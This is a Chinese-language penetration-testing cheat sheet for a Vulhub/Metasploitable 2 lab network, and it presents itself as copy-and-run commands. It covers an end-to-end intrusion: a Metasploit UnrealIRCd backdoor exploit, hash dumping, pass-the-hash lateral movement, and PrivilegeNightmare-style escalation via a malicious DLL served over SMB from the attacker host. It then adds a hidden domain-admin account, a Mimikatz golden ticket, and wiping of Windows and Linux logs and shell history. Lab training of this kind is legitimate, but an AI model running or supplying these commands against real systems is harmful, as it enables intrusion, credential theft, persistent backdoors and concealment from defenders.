本速查表基于之前的Vulhub+Metasploitable 2 靶场实操清单,涵盖从外网突破到持久化的全流程命令,可直接复制执行。
环境说明:攻击机 Kali(
192.168.56.101)、跳板机 Metasploitable 2(192.168.56.102)、域控制器(192.168.56.103)、域内主机(192.168.56.104)
一、 外网突破:获取跳板机权限
1. 端口扫描与漏洞发现
bash
运行
# nmap 全端口版本扫描 nmap -sV -p- 192.168.56.102 # 搜索 UnrealIRCd 漏洞模块(msfconsole 内执行) msfconsole search unrealircd use exploit/unix/irc/unrealircd_3281_backdoor set RHOSTS 192.168.56.102 run2. 获取 Meterpreter 会话后基础操作
bash
运行
# 查看跳板机系统信息 sysinfo # 切换到系统 shell shell # 后台挂起会话(返回 msfconsole) background二、 内网信息收集
1. 内网存活主机探测
bash
运行
# Meterpreter 内执行 ping 扫描 run post/multi/gather/ping_sweep RHOSTS=192.168.56.0/24 # 手动 ARP 扫描(Kali 本机执行) arp-scan -l # 扫描当前网段 fping -g 192.168.56.0/24 # 批量 ping 探测2. 域环境信息枚举
bash
运行
# 检测是否存在域(跳板机 shell 内执行) ipconfig /all # 查看 DNS 后缀 net config workstation # 查询域控制器列表 nltest /dclist:test.com # Impacket 工具查询域用户(Kali 执行) python3 /usr/share/doc/python3-impacket/examples/net.py user /domain -target-ip 192.168.56.103 # BloodHound 可视化域权限(Kali 执行) bloodhound # 启动工具,导入域信息3. 主机详细信息收集
| 系统类型 | 核心命令 |
|---|---|
| Windows | systeminfo(系统补丁)netstat -ano(网络连接)tasklist /svc(进程服务) |
| Linux | uname -a(内核版本)ps -ef(进程)find / -perm -u+s -type f 2>/dev/null(SUID 文件) |
三、 横向移动:哈希传递攻击(PTH)
1. 提取目标用户哈希
bash
运行
# Windows 主机哈希提取(Meterpreter 内) run post/windows/gather/hashdump # Linux 主机凭证扫描(跳板机 shell 内) wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh chmod +x linpeas.sh ./linpeas.sh2. Impacket PTH 横向移动(Kali 执行)
bash
运行
# 格式:psexec.py 域名/用户名@目标IP -hashes LM哈希:NTLM哈希 python3 /usr/share/doc/python3-impacket/examples/psexec.py test.com/user1@192.168.56.104 -hashes aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef # 若获取明文密码,直接登录 WinRM evil-winrm -i 192.168.56.104 -u user1 -p P@ssw0rd!四、 权限提升:PrintNightmare 漏洞利用
1. 攻击机准备恶意 DLL 与 SMB 共享
bash
运行
# 下载漏洞利用脚本 git clone https://github.com/cube0x0/CVE-2021-34527.git cd CVE-2021-34527 # 启动 SMB 共享(供靶机下载 DLL) impacket-smbserver share . -smb2support2. 靶机执行提权命令(Windows 10 主机 shell 内)
cmd
# 挂载攻击机 SMB 共享 net use \\192.168.56.101\share # 执行提权脚本,获取 SYSTEM 权限 CVE-2021-34527.exe \\192.168.56.101\share\malicious.dll五、 持久化:域内留后门
1. 创建隐藏域管理员账户
cmd
# 在域控制器执行,创建带 $ 隐藏账户 net user hidden_admin P@ssw0rd! /add /domain net group "Domain Admins" hidden_admin /add /domain2. 生成黄金票据(Mimikatz 执行)
bash
运行
# 提取 KRBTGT 账户哈希 mimikatz.exe "lsadump::lsa /inject /name:krbtgt" exit # 生成黄金票据(替换 SID 和哈希值) mimikatz.exe "kerberos::golden /domain:test.com /sid:S-1-5-21-xxxxxx /krbtgt:哈希值 /user:backdoor /ptt" exit六、 痕迹清理
1. Windows 日志清理
cmd
# 清空系统、安全、应用日志 wevtutil cl System wevtutil cl Security wevtutil cl Application2. Linux 日志清理
bash
运行
# 清空 SSH 登录日志和系统日志 echo "" > /var/log/auth.log echo "" > /var/log/syslog # 清空命令历史记录 history -c && history -w七、 常用工具命令速查
| 工具用途 | 命令 |
|---|---|
| Impacket 横向移动 | python3 wmiexec.py test.com/admin@192.168.56.104 -hashes 哈希值 |
| 密码哈希破解 | john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt |
| 端口扫描 | masscan 192.168.56.0/24 -p 135,445,3389 --rate=1000 |
| 提权扫描 | ./PrivescCheck.ps1(Windows)./linpeas.sh(Linux) |
)
